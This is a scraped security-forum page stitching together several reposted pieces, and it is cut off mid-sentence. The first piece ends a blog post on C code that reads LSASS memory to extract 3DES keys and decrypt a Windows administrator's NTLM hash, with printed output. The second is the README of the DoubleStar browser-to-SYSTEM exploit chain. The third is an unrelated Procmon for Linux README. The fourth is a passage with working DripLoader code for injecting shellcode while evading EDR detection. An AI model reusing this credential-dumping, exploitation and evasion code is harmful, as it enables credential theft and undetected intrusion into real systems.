0; ULONGLONG DES_pointer = 0; unsigned char* iv_vector = NULL; unsigned char* DES_key = NULL; KIWI_BCRYPT_HANDLE_KEY h3DesKey; KIWI_BCRYPT_KEY81 extracted3DesKey; LSAINITIALIZE_NEEDLE LsaInitialize_needle = { 0x83, 0x64, 0x24, 0x30, 0x00, 0x48, 0x8d, 0x45, 0xe0, 0x44, 0x8b, 0x4d, 0xd8, 0x48, 0x8d, 0x15 }; LOGONSESSIONLIST_NEEDLE LogonSessionList_needle = { 0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74 }; PBYTE LsaInitialize_needle_buffer = NULL; PBYTE needle_buffer = NULL; int offset_LsaInitialize_needle = 0; int offset_LogonSessionList_needle = 0; ULONGLONG currentElem = 0; original = start; /* Save the whole region in a buffer */ lsasrv = (LPSTR)malloc(size); while (start < end) { DWORD bytes_read = 0; DWORD bytes_written = 0; CHAR tmp = NULL; reader.QuadPart = v2p(start); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &tmp, 1, &bytes_read, NULL); lsasrv[cursor] = tmp; cursor++; start = original + cursor; } lsasrv_size = cursor; // Use mimikatz signatures to find the IV/keys printf("\t\t===================[Crypto info]===================\n"); LsaInitialize_needle_buffer = (PBYTE)malloc(sizeof(LSAINITIALIZE_NEEDLE)); memcpy(LsaInitialize_needle_buffer, &LsaInitialize_needle, sizeof(LSAINITIALIZE_NEEDLE)); offset_LsaInitialize_needle = memmem((PBYTE)lsasrv, lsasrv_size, LsaInitialize_needle_buffer, sizeof(LSAINITIALIZE_NEEDLE)); printf("[*] Offset for InitializationVector/h3DesKey/hAesKey is %d\n", offset_LsaInitialize_needle); memcpy(&iv_offset, lsasrv + offset_LsaInitialize_needle + 0x43, 4); //IV offset printf("[*] IV Vector relative offset: 0x%08llx\n", iv_offset); iv_vector = (unsigned char*)malloc(16); memcpy(iv_vector, lsasrv + offset_LsaInitialize_needle + 0x43 + 4 + iv_offset, 16); printf("\t\t[/!\\] IV Vector: "); for (int i = 0; i < 16; i++) { printf("%02x", iv_vector[i]); } printf(" [/!\\]\n"); free(iv_vector); memcpy(&hDes_offset, lsasrv + offset_LsaInitialize_needle - 0x59, 4); //DES KEY offset printf("[*] 3DES Handle Key relative offset: 0x%08llx\n", hDes_offset); reader.QuadPart = v2p(original + offset_LsaInitialize_needle - 0x59 + 4 + hDes_offset); DES_pointer = readPhysMemPointer(reader); printf("[*] 3DES Handle Key pointer: 0x%08llx\n", DES_pointer); reader.QuadPart = v2p(DES_pointer); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &h3DesKey, sizeof(KIWI_BCRYPT_HANDLE_KEY), &bytes_read, NULL); reader.QuadPart = v2p((ULONGLONG)h3DesKey.key); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &extracted3DesKey, sizeof(KIWI_BCRYPT_KEY81), &bytes_read, NULL); DES_key = (unsigned char*)malloc(extracted3DesKey.hardkey.cbSecret); memcpy(DES_key, extracted3DesKey.hardkey.data, extracted3DesKey.hardkey.cbSecret); printf("\t\t[/!\\] 3DES Key: "); for (int i = 0; i < extracted3DesKey.hardkey.cbSecret; i++) { printf("%02x", DES_key[i]); } printf(" [/!\\]\n"); free(DES_key); printf("\t\t================================================\n"); needle_buffer = (PBYTE)malloc(sizeof(LOGONSESSIONLIST_NEEDLE)); memcpy(needle_buffer, &LogonSessionList_needle, sizeof(LOGONSESSIONLIST_NEEDLE)); offset_LogonSessionList_needle = memmem((PBYTE)lsasrv, lsasrv_size, needle_buffer, sizeof(LOGONSESSIONLIST_NEEDLE)); memcpy(&LogonSessionList_offset, lsasrv + offset_LogonSessionList_needle + 0x17, 4); printf("[*] LogonSessionList Relative Offset: 0x%08llx\n", LogonSessionList_offset); LogonSessionList = original + offset_LogonSessionList_needle + 0x17 + 4 + LogonSessionList_offset; printf("[*] LogonSessionList: 0x%08llx\n", LogonSessionList); reader.QuadPart = v2p(LogonSessionList); printf("\t\t===================[LogonSessionList]==================="); while (currentElem != LogonSessionList) { if (currentElem == 0) { currentElem = LogonSessionList; } reader.QuadPart = v2p(currentElem); currentElem = readPhysMemPointer(reader); //printf("Element at: 0x%08llx\n", currentElem); USHORT length = 0; LPWSTR username = NULL; ULONGLONG username_pointer = 0; reader.QuadPart = v2p(currentElem + 0x90); //UNICODE_STRING = USHORT LENGHT USHORT MAXLENGTH LPWSTR BUFFER result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &length, 2, &bytes_read, NULL); //Read Lenght Field username = (LPWSTR)malloc(length + 2); memset(username, 0, length + 2); reader.QuadPart = v2p(currentElem + 0x98); username_pointer = readPhysMemPointer(reader); //Read LPWSTR reader.QuadPart = v2p(username_pointer); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, username, length, &bytes_read, NULL); //Read string at LPWSTR wprintf(L"\n[+] Username: %s \n", username); free(username); ULONGLONG credentials_pointer = 0; reader.QuadPart = v2p(currentElem + 0x108); credentials_pointer = readPhysMemPointer(reader); if (credentials_pointer == 0) { printf("[+] Cryptoblob: (empty)\n"); continue; } printf("[*] Credentials Pointer: 0x%08llx\n", credentials_pointer); ULONGLONG primaryCredentials_pointer = 0; reader.QuadPart = v2p(credentials_pointer + 0x10); primaryCredentials_pointer = readPhysMemPointer(reader); printf("[*] Primary credentials Pointer: 0x%08llx\n", primaryCredentials_pointer); USHORT cryptoblob_size = 0; reader.QuadPart = v2p(primaryCredentials_pointer + 0x18); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &cryptoblob_size, 4, &bytes_read, NULL); if (cryptoblob_size % 8 != 0) { printf("[*] Cryptoblob size: (not compatible with 3DEs, skipping...)\n"); continue; } printf("[*] Cryptoblob size: 0x%x\n", cryptoblob_size); ULONGLONG cryptoblob_pointer = 0; reader.QuadPart = v2p(primaryCredentials_pointer + 0x20); cryptoblob_pointer = readPhysMemPointer(reader); //printf("Cryptoblob pointer: 0x%08llx\n", cryptoblob_pointer); unsigned char* cryptoblob = (unsigned char*)malloc(cryptoblob_size); reader.QuadPart = v2p(cryptoblob_pointer); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, cryptoblob, cryptoblob_size, &bytes_read, NULL); printf("[+] Cryptoblob:\n"); for (int i = 0; i < cryptoblob_size; i++) { printf("%02x", cryptoblob[i]); } printf("\n"); } printf("\t\t================================================\n"); free(needle_buffer); free(lsasrv); } If you wonder why I am not calling windows API to decrypt the info… It was 4:00 AM when we wrote this . Anyway, fire in the hole! [!] LsaSrv.dll found! [0x7ff845130000-0x7ff8452ce000] (1695744 bytes) ===================[Crypto info]=================== [*] Offset for InitializationVector/h3DesKey/hAesKey is 305033 [*] IV Vector relative offset: 0x0013be98 [/!\] IV Vector: d2e23014c6608529132d0f21144ee0df [/!\] [*] 3DES Handle Key relative offset: 0x0013bf4c [*] 3DES Handle Key pointer: 0x1d4d3610000 [/!\] 3DES Key: 46bca8b85491846f5c7fb42700287d0437c49c15e7b76280 [/!\] ================================================ [*] LogonSessionList Relative Offset: 0x0012b0f1 [*] LogonSessionList: 0x7ff8452b52a0 ===================[LogonSessionList]=================== [+] Username: Administrador [*] Credentials Pointer: 0x1d4d3ba96c0 [*] Primary credentials Pointer: 0x1d4d3ae49f0 [*] Cryptoblob size: 0x1b0 [+] Cryptoblob: f0e368d8302af9bbcd247687552e8207d766e674c99a61907e78a173d5e4d475df165ec1fcba3b5d3463f8bd7ce5fa6457d043147dcf26a6e03ec12d1216d57953a7f4cbdcaeec2c6a27787c332db706a5287a77957d09d546590d7f32a117f69d983290c01b1ad83cf66916ee76314c17605518a17d7ea9db2de530b1298e5178fcc638e1ae106542dcb46e37a09943dd10e3e2f15a99b93989361aa3a6e6ed8e98aab5578712bcf0f9e5a5372542f61a9032bf5d110278253c4f602107a02bf2cfe07fae7f81a4dee6440a596278e7c06eee06de5aa7f705bd6132dea0327ad869eca5da1538e098edfefcd050dd6e36a0a3196cdf5ee6786d0b62a3d526981f6c4fc503d43238887cf6f3c51cca01b912194242d7e5a76522aaf791c467ea6035a06219ea2aafc2860e6db56ddb77936871316e3f18fd9b1425f948c925171829e460cf7c31f9a0396705bcb1bfd0055b25de160cf816472180270f36e9224868d1377349f7bb001e7edfe52dbd1915a70fb686f850086732c57ba26423f7a3691ddb9b23b5f2166a56ee82d30571ffb79b222e707f6dc2cc5f986723d99229345b2d0b97371abb1573f59efecd6a Let’s decrypt with python (yeah, we know, we are the worst ) >>> from pyDes import * >>> k = triple_des("46bca8b85491846f5c7fb42700287d0437c49c15e7b76280".decode("hex"), CBC, "\x00\x0d\x56\x99\x63\x93\x95\xd0") >>> k.decrypt("f0e368d8302af9bbcd247687552e8207d766e674c99a61907e78a173d5e4d475df165ec1fcba3b5d3463f8bd7ce5fa6457d043147dcf26a6e03ec12d1216d57953a7f4cbdcaeec2c6a27787c332db706a5287a77957d09d546590d7f32a117f69d983290c01b1ad83cf66916ee76314c17605518a17d7ea9db2de530b1298e5178fcc638e1ae106542dcb46e37a09943dd10e3e2f15a99b93989361aa3a6e6ed8e98aab5578712bcf0f9e5a5372542f61a9032bf5d110278253c4f602107a02bf2cfe07fae7f81a4dee6440a596278e7c06eee06de5aa7f705bd6132dea0327ad869eca5da1538e098edfefcd050dd6e36a0a3196cdf5ee6786d0b62a3d526981f6c4fc503d43238887cf6f3c51cca01b912194242d7e5a76522aaf791c467ea6035a06219ea2aafc2860e6db56ddb77936871316e3f18fd9b1425f948c925171829e460cf7c31f9a0396705bcb1bfd0055b25de160cf816472180270f36e9224868d1377349f7bb001e7edfe52dbd1915a70fb686f850086732c57ba26423f7a3691ddb9b23b5f2166a56ee82d30571ffb79b222e707f6dc2cc5f986723d99229345b2d0b97371abb1573f59efecd6a".decode("hex"))[74:90].encode("hex") '191d643eca7a6b94a3b6df1469ba2846' We can check that effectively the Administrador’s NTLM hash is 191d643eca7a6b94a3b6df1469ba2846: C:\Windows\system32>C:\Users\ortiga.japonesa\Downloads\mimikatz-master\mimikatz-master\x64\mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 May 8 2021 00:30:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # sekurlsa::msv [!] LogonSessionListCount: 0x7ff8452b4be0 [!] LogonSessionList: 0x7ff8452b52a0 [!] Data Address: 0x1d4d3bfb5c0 Authentication Id : 0 ; 120327884 (00000000:072c0ecc) Session : CachedInteractive from 1 User Name : Administrador Domain : ACUARIO Logon Server : WIN-UQ1FE7E6SES Logon Time : 08/05/2021 0:44:32 SID : S-1-5-21-3039666266-3544201716-3988606543-500 msv : [00000003] Primary * Username : Administrador * Domain : ACUARIO * NTLM : 191d643eca7a6b94a3b6df1469ba2846 * SHA1 : 5f041d6e1d3d0b3f59d85fa7ff60a14ae1a5963d * DPAPI : b4772e37b9a6a10785ea20641c59e5b2 MMmm… that PtH smell… EoF Playing with Windows Internals and reading Mimikatz code is a nice exercise to learn and practice new things. As we said at the begin, probably this approach is not the best (our knowledge on this topic is limited), so if you spot errors/misconceptions/typos please contact us so we can fix it. The code can be found in our repo as SnoopyOwl. We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC. updated_at 08-05-2021 Sursa: https://adepts.of0x.cc/physical-graffiti-lsass/
  2. Nytro

    DoubleStar

    ________ ___. .__ _________ __ \______ \ ____ __ __\_ |__ | | ____ / _____/_/ |_ _____ _______ | | \ / _ \ | | \| __ \ | | _/ __ \ \_____ \ \ __\\__ \ \_ __ \ | ` \( <_> )| | /| \_\ \| |__\ ___/ / \ | | / __ \_| | \/ /_______ / \____/ |____/ |___ /|____/ \___ > /_______ / |__| (____ /|__| \/ \/ \/ \/ \/ Windows 8.1 IE/Firefox RCE -> Sandbox Escape -> SYSTEM EoP Exploit Chain ______________ | Remote PAC | |____________| ^ | HTTPS _______________ RPC/ALPC _______________ RPC/ALPC _______________ | firefox.exe | ----------> | svchost.exe | -----------> | spoolsv.exe | |_____________| |_____________| <----------- |_____________| | RPC/Pipe | _______________ | | malware.exe | <---| Execute impersonating NT AUTHORY\SYSTEM |_____________| ~ Usage To run this exploit chain, download the full release/folder structure to an unpatched Windows 8.1 x64 machine and load either of these two .html files while connected to the internet: - CVE-2019-17026\Forrest_Orr_CVE-2019-17026_64-bit.html - via Firefox v65-69 64-bit. - CVE-2020-0674\Forrest_Orr_CVE-2020-0674_64-bit.html - via Internet Explorer 11 64-bit (Enhanced Protected Mode enabled). The initial RCE may be run through either IE or FF, and will result in the execution of a cmd.exe process to your user session with NT AUTHORY\SYSTEM privileges. The individual exploits have been successfully tested in the following context: - CVE-2020-0674 - IE8 64-bit and WPAD on Windows 7 x64, IE11 64-bit and WPAD on Windows 8.1 x64. - CVE-2019-17026 - Firefox 65-69 (64-bit) on Windows 7, 8.1 and 10 x64. Note that while the individual exploits themselves may work on multiple versions of Windows, the full chain will only work on Windows 8.1. ~ Overview While this exploit chain makes use of two (now patched) 0day exploits, it also contains a sandbox escape and EoP technique which are still as of 5/4/2021 not patched, and remain feasible for integration into future attacka chains today. The Darkhotel APT group (believed to originate from South Korea) launched a campaign againt Chinese and Japanese business executives and government officials through a combination of spear phishing and hacking of luxury hotel networks in early 2020. The exploits they used (CVE-2020-0674 and CVE-2019-17026, together dubbed "Double Star") were slight 0day variations of old/existing exploits from 2019: specifically UAF bugs in the legacy JavaScript engine (jscript.dll) and aliasing bugs in the Firefox IonMonkey engine. What made the use of these 0day interesting went beyond their ability to achieve RCE through the Internet Explorer and Firefox web browsers: CVE-2020-0674 in particular (a UAF in the legacy jscript.dll engine) is exploitable in any process in which legacy JS code can be executed via jscript.dll. In late 2017, Google Project Zero released a blog post entitled "aPAColypse now: Exploiting Windows 10 in a Local Network with WPAD/PAC and JScript" [1]. This research brought to light a very interesting attack vector which (at the time) affected all versions of Windows from 7 onward: the WPAD service (or "WinHTTP Web Proxy Auto-Discovery Service") contains an ancient functionality for updating proxy configurations via a "PAC" file. Any user which can speak to the WPAD service (running within an svchost.exe process as LOCAL SERVICE) over RPC can coerce it into downloading a PAC file from a remote URL containing JS code which is responsible for setting the correct proxy configuration for a user supplied URL. Most notably, the legacy jscript.dll engine is used to parse these PAC files. This opened up an attack vector wherein any process (regardless of limited user privileges or even sandboxing) could connect to the local WPAD service over ALPC and coerce it into downloading a malicious PAC file containing a jscript.dll exploit from a remote URL. This would result in code execution in the context of LOCAL SERVICE. Darkhotel took this concept and used it as their sandbox escape after they obtained RCE via Firefox or Internet Explorer. The next step in their attack chain is unclear: it appears that they somehow elevated their privileges from LOCAL SERVICE to SYSTEM and proceeded to execute their malware from this context. In all of the analysis of the Darkhotel Double Star attack chain, I was not able to find a detailed explanation of how they achieved this, however it is safe to assume that their technique need not have been a 0day exploit. Processes launched by the LOCAL SERVICE account are provided with the SeImpersonate privilege by default and thus can elevate their security context in the event they can coerce a privileged connection to themselves via named pipes or ALPC. It is likely that the Darkhotel APT group used Rotten Potato for their EoP from LOCAL SERVICE, as this was the simplest and most common technique in widespread use several years ago (as well as the technique used in the Google Project Zero "aPAColypse now" research, however I settled on a more robust/modern technique instead: named pipe impersonation of a coerced RPC connection from the Print Spooler [2]. This technique combined an old RPC interface popular among Red Teamers for TGT harvesting in environments with unconstrained delegation enabled (aka the "Printer Bug") with an impersonation/Rotten Potato style attack adapted for local privilege escalation. Additionally, rather than targeting Windows 7, I decided to focus on Windows 8.1 due to the challenge presented by its enhanced security mitigations such as non-deterministic LFH, high entropy ASLR and Control Flow Guard (CFG). ~ CVE-2020-0674 Malicious PAC file containing CVE-2020-0674 UAF exploit - downloaded into the WPAD service svchost.exe (LOCAL SERVICE) via RPC trigger. Contains stage three shellcode (Spool Potato EoP). This exploit may serve a dual purpose as an initial RCE attack vector through IE11 64-bit aas well. _______________ RPC _______________ CVE-2020-0674 ________________ | firefox.exe | -----> | svchost.exe | ---------------> | Spool Potato | |_____________| |_____________| | shellcode | |______________| ~ CVE-2019-17026 Firefox 64-bit IonMonkey JIT/Type Confusion RCE. Represents the initial attack vector when a user visits an infected web page with a vulnerable version of Firefox. This component contains a stage one (egg hunter) and stage two (WPAD sandbox escape) shellcode, the latter of which is only effective on Windows 8.1 due to hardcoded RPC IDL interface details for WPAD. _______________ JIT spray ______________ DEP bypass _______________________ | firefox.exe | -----------> | Egg hunter | ------------> | WPAD sandbox escape | |_____________| | shellcode | | shellcode (heap) | |____________| |_____________________| ~ Payloads This exploit chain has three shellcode payloads, found within this repository under Payloads\Compiled\JS in their JavaScript encoded shellcode form: - Stage one: egg hunter shellcode (ASM). - Stage two: WPAD sandbox escape shellcode (C DLL, sRDI to shellcode). - Stage three: Spool Potato privilege escalation shellcode (C DLL, sRDI to shellcode). When IE is used as the initial RCE attack vector, only the stage two and three shellcodes are needed. When FF is used as the initial RCE attack vector, all three are used. I've also included several additional shellcodes for testing purposes (a MessageBoxA and WinExec shellcode). Note when using these that in the case of Firefox CVE-2019-17026, the shellcode should be represented as a Uint8Array prefixed by the following egg QWORD: 0x8877665544332211. In the case of CVE-2020-0674, the shellcode should be represented as a DWORD array. Also note that when using a WinExec or MessageBoxA payload in conjunction with Firefox CVE-2019-17026, you must adjust the sandbox content level in the "about:config" down to 2 first. ~ Credits maxpl0it - for writing the initial analysis and PoC for CVE-2019-17026 with a focus on the Linux OS, and for writing the initial analysis and PoC for CVE-2020-0674 with a focus on IE8/11 on Windows 7 x64. 0vercl0k - for documenting IonMonkey internals in relation to aliasing and the GVN. HackSys Team - for tips on the WPAD service and low level JS debugging. itm4n - for the original research on combining the RPC printer bug with named pipe impersonation. ~ Links [1] https://googleprojectzero.blogspot.com/2017/12/apacolypse-now-exploiting-windows-10-in_18.html [2] https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/ Sursa: https://github.com/forrest-orr/DoubleStar
  3. Process Monitor for Linux (Preview) Process Monitor (Procmon) is a Linux reimagining of the classic Procmon tool from the Sysinternals suite of tools for Windows. Procmon provides a convenient and efficient way for Linux developers to trace the syscall activity on the system. Installation & Usage Requirements OS: Ubuntu 18.04 lts cmake >= 3.14 (build-time only) libsqlite3-dev >= 3.22 (build-time only) Install Procmon Checkout our install instructions for distribution specific steps to install Procmon. Building Procmon from source 1. Install build dependencies sudo apt-get -y install bison build-essential flex git libedit-dev \ libllvm6.0 llvm-6.0-dev libclang-6.0-dev python zlib1g-dev libelf-dev 2. Build Procmon git clone https://github.com/Microsoft/Procmon-for-Linux cd Procmon-for-Linux mkdir build cd build cmake .. make Building Procmon Packages The distribution packages for Procmon for Linux are constructed utilizing cpack. To build a deb package of Procmon on Ubuntu simply run: cd build cpack .. Usage Usage: procmon [OPTIONS] OPTIONS -h/--help Prints this help screen -p/--pids Comma separated list of process ids to monitor -e/--events Comma separated list of system calls to monitor -c/--collect [FILEPATH] Option to start Procmon in a headless mode -f/--file FILEPATH Open a Procmon trace file Examples The following traces all processes and syscalls on the system sudo procmon The following traces processes with process id 10 and 20 sudo procmon -p 10,20 The following traces process 20 only syscalls read, write and openat sudo procmon -p 20 -e read,write,openat The following traces process 35 and opens Procmon in headless mode to output all captured events to file procmon.db sudo procmon -p 35 -c procmon.db The following opens a Procmon tracefile, procmon.db, within the Procmon TUI sudo procmon -f procmon.db Feedback Ask a question on StackOverflow (tag with ProcmonForLinux) Request a new feature on GitHub Vote for popular feature requests File a bug in GitHub Issues Contributing If you are interested in fixing issues and contributing directly to the code base, please see the document How to Contribute, which covers the following: How to build and run from source The development workflow, including debugging and running tests Coding Guidelines Submitting pull requests Please see also our Code of Conduct. License Copyright (c) Microsoft Corporation. All rights reserved. Licensed under the MIT License. Sursa: https://github.com/Sysinternals/ProcMon-for-Linux/
  4. Bypassing EDR real-time injection detection logic This is not really about suppressing/bypassing event collection, and more on understanding EDR architecture design flaws, lazy detection logic and correlation to minimize chance of triggering alerts with events that are (at least partially) collected. Some great posts on bypassing EDR agent collection: Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR (outflank) A tale of EDR bypass methods (@s3cur3th1ssh1t) FireWalker: A New Approach to Generically Bypass User-Space EDR Hooking (mdsec) Hell's Gate (@smelly__vx, @am0nsec) Halo's Gate - twin sister of Hell's Gate (sektor7) Another method of bypassing ETW and Process Injection via ETW registration (@modexpblog) Data Only Attack: Neutralizing EtwTi Provider (@slaeryan, kernel mode) Introduction In the previous post we discussed how solutions which use reliable, kernel-based sources for remote memory allocation events can use these to identify many of the in-the-wild injections with relative ease, regardless of the specific technique used, and without worrying that the event source is trivial to bypass from the usermode. Most notably Microsoft uses that ETW, though there are vendors who do it better. Today I wanted to share how easy it is to bypass any memory allocation-based logic. We will also bypass thread initialization alerting, which combined give us a technique undetectable by MDATP and many other EDRs out there, as of today. It is important to expose detection gaps like this, not only to force security vendors to improve defenses, but primarily to build awareness around inherent limitations of these solutions and the need for in-house security R&D programs, or at least use of well-engineered managed detection services for more complete coverage. Check out my previous post on detecting process injection with kernel ETW. T1055 vs EDR Let's first take a look at what independent evaluations can tell us about process injections, and if there is even anything to bypass. It's definitely good to know the product you're using is not able to flag Meterpreter's migrate command and process hollowing procedures from a 5+ year old Carbanak malware available on GitHub, even with prior knowledge of what is going to be tested, and half a year to prepare if needed. Other than that value of the last evaluation in context of injections is very limited, and we are not getting the full picture of how much each vendor invests into researching TTPs relevant right now, and in the future, or how robust the detection capability and data sources really are. https://ela.st/mitre-round3 While some EDRs were not able to flag on the elementary techniques, many improved detection capability to the point that today, it is not uncommon for process injection to be considered OPSEC-expensive by red teams. Experienced operators tend to tailor detection bypasses per-solution, and in some environments they choose to avoid injecting altogether, as the very limited set of APIs Windows exposes for memory and thread management are under close surveillance. We are going to talk about bypassing the mature solutions today - for the ones with T1055 misses here just use APC injection and you'll probably be fine. Let's first discuss all the detection opportunities for anomalous remote thread creation. CRT anomalies The API getting most attention has to be kernel32!CreateRemoteThread, but we are really talking about ntdll!NtCreateThreadEx, or the kernel mode target intercepted through kernel callbacks. https://github.com/elastic/detection-rules Here we have a basic detection for a specific Windows process - msbuild.exe creating a new thread in a remote process. Even though criticality of a potential true positive would be quite high, after testing the rule author decided it is only suitable for low severity (probably due to FP-rate), which likely degrades the rule to an IR label/enrichment in most environments. Such a simple detection rule is unlikely to be part of a mature EDR solution where customers expect to receive alerts for activities like this with high severity, while keeping noise down to allow their analysts to review and classify the important stuff. https://github.com/FalconForceTeam/FalconFriday A more generic, custom MDATP thread creation rule based around the new FileProfile() enrichment function - detects extremely rare files creating threads in remote processes. Very useful to implement in-house, but still unlikely to be found in EDRs in such a simple form, as it would cause substantial amounts of false positives in certain environments, and could prove difficult to maintain. As an example, Defender logs most remote thread creations as labeled events, but low file prevalence is not good enough of an indicator to trigger alert, and there is more advanced logic in play - true for most decent EDRs. CRT events logged by Defender Understanding correlation By "detections" and "alerts" I do not just mean labeled activity which can be found somewhere in the platform, but rather independent pieces of logic able to signal threats with high enough fidelity to generate user-facing security incidents with no additional activity tagged on the endpoint. (I also assume the platform is not incredibly noisy, to the level of it being unusable) This is important to remember as EDRs use various kinds of correlation to link otherwise undetected activities to existing incidents initiated by high fidelity alerts, or generate them based on some risk score analysis often affectionately called "AI", making it difficult to judge whether some particular TTP would be detected in isolation. Some types of correlation can be very complex and difficult for adversaries to guess, but due to the high costs associated with preserving active context and using it in detection, time-based correlation plays a role in most. On-agent detections, activity and software inventories are often not implemented or limited in scope due to reverse engineering concerns or architecting difficulties. We will exploit this fact later on when building our shellcode injector by introducing delays in execution as one way to avoid detection. The concept is not new and is commonly used in network attacks where IDS solutions tend to detect based on thresholds. For the same reason choosing your EDR vendor based on the numerical results of things like the Mitre evaluation and percentage of coverage - is not a good idea. Among other issues, the test rounds are executed in an unrealistically short time window of around 30 minutes for the whole attack kill chain, which means time correlation of labeled events from the host to a single alert is good enough to score 100% coverage. High fidelity alerts So we know that even though the number of functions to monitor is limited, the volume of legitimate events poses significant challenges for high fidelity detection, and forces defenders to narrow down what constitutes "suspicious", resulting in heavy filtering or log&ignore of many collected events. For thread creation the most common constraint is thread starting process ≠ hosting process - so monitoring only remote thread creation, usually also limited to those with: thread start in image "unbacked" MEM_COMMIT-type segment the size of segment being larger than X and on scale this will still generate very significant amount of false positives, which may lead to further filtering, for example: thread location (target) only in Windows built-in executables only a subset of these thread initiator (source) only in risky executables unknown hashes low file prevalence risky paths (%userprofile%, %temp% etc.) not seen on the network/on the host memory page contains suspicious stuff Machine learning models are often employed to attempt solving this issue, and so on - these assumptions will differ for vendors, but the idea is to tame thread creation. The less mature solutions in fact often rely on thread creation hooking/callbacks as the only source of data for injection detection. While it is true that for majority of injection techniques a new thread will be created in the target process at some point, the way in which it's created is often unexpected and makes monitoring infeasible, thus relying exclusively on ntdll!NtCreateThread(Ex) hooking/thread creation callbacks nowadays is an easily exploitable design flaw. SetThreadContext In case of process hollowing or thread hijacking our target thread has already been created legitimately by the Windows Loader or the target application locally, and thus there is nothing to detect upon. This is one of the reasons CobaltStrike execute-assembly uses SetThreadContext instead of CRT injection on the sacrificial process. Once we have the telemetry, on scale it's much easier to detect certain SetThreadContext anomalies, than CRT-injection, and today in many environments it generates high criticality alerts, rendering fork&run useless in stealthy offensive ops. QueueUserAPC Asynchronous Procedure Calls provide another avenue for avoiding thread creation. An APC can be queued for an existing thread, and executed once it enters an alertable state. In recent years userland hooking evasion is getting a lot of coverage, and Early Bird injection has popularized use of APCs for that purpose. The idea is to queue an APC in a newly spawned, suspended process, before the ntdll!LdrpInitializeProcess function had a chance to run. That way our scheduled routine is executed before the hooking DLLs are loaded into the target process. Once again this technique becomes easy to detect when we stop relying solely on hooking. DripLoader Allocating memory To bypass any memory allocation based logic we will only commit page granularity, or PageSizesized pages, which on Windows 10 with a modern processor is 4kB: this constant found in SYSTEM_INFO structure tells us the lowest possible size of a VM allocation since most legitimate remote VM operations work on a single, or a few bytes, 4kB is by far the most prevalent allocation size (>95%), making it extremely challenging to detect on To accomplish this we need to deal with some inconveniences we need our shellcode in memory as a continuous byte sequence which means we cannot let kernel32!VirtualAllocEx choose base, as it might reserve memory at an address where the other allocations will not fit in Windows, any new VM allocation made with kernel32!VirtualAllocEx and similar is rounded up to AllocationGranularity which is another constant found in SYSTEM_INFO and is usually 64kB for example, if we allocate 4kB of MEM_COMMIT | MEM_RESERVE memory at 0x40000000, the whole 0x40010000 (64kB) region will be unavailable for new allocations Steps we take pre-define a list of 64 bit base addresses and VirtualQueryEx the target process to find the first region able to fit our shellcode blob const std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000, (void*)0x0000000010000000, (void*)0x0000000021000000, (void*)0x0000000032000000, (void*)0x0000000043000000, (void*)0x0000000050000000, (void*)0x0000000041000000, (void*)0x0000000042000000, (void*)0x0000000040000000, (void*)0x0000000022000000 }; LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv) { MEMORY_BASIC_INFORMATION mbi; for (auto base : VC_PREF_BASES) { VirtualQueryEx( hProc, base, &mbi, sizeof(MEMORY_BASIC_INFORMATION) ); if (MEM_FREE == mbi.State) { uint64_t i; for (i = 0; i < cVmResv; ++i) { LPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran)); VirtualQueryEx( hProc, currentBase, &mbi, sizeof(MEMORY_BASIC_INFORMATION) ); if (MEM_FREE != mbi.State) break; } if (i == cVmResv) { // found suitable base return base; } } } return nullptr; } reserve required number of full AllocationGranularity (64kB) sized regions, and then loop over those commiting 4kB pages to ensure page alignment // MEM_RESERVE, NO_ACCESS, 64kB for (i = 1; i <= cVmResv; ++i) { // sleeps here ANtAVM( hProc, &currentVmBase, NULL, &szVmResv, MEM_RESERVE, PAGE_NOACCESS ); if (STATUS_SUCCESS == status) vcVmResv.push_back(currentVmBase); else return 4; currentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv); } // MEM_COMMIT, PAGE_READWRITE -> PAGE_EXECUTE_READ, 4kB for (i = 0; i < cVmResv; ++i) { for (cmm_i = 0; cmm_i < cVmCmm; ++cmm_i) { DWORD offset = (cmm_i * szVmCmm); currentVmBase = (LPVOID)((DWORD_PTR)vcVmResv[i] + offset); ANtAVM( hProc, &currentVmBase, NULL, &szVmCmm, MEM_COMMIT, PAGE_READWRITE ); // sleeps here SIZE_T szWritten{ 0 }; ANtWVM( hProc, currentVmBase, &shellcode[offsetSc], szVmCmm, &szWritten ); offsetSc += szVmCmm; // sleeps here ANtPVM( hProc, &currentVmBase, &szVmCmm, PAGE_EXECUTE_READ, &oldProt ); } } The pages are also written to and individually reprotected with each run to avoid large RegionSize of target memory page in properties of logged VirtualProtectEx events. (TiEtw provides this, and hooks can too). Creating the thread Now that we have our shellcode in the remote process we need to initiate it's execution. To do this we will use the CreateThreadEx native API which is the ntdll target of CRT, and hence very commonly called by legitimate software. To bypass any detections we will: create the new thread from MEM_IMAGE base address moreover, we use a known-good module loaded by the Windows Loader, ntdll.dll the location will be patched with a far jmp to our shellcode base at the time of thread creation Note that we do not need to run in a MEM_IMAGE segment, as we only care about logging of arguments in the TiEtw/Hook event. If our shellcode creates a new thread (which would happen for example when using sRDI beacon.dll), the locally created thread 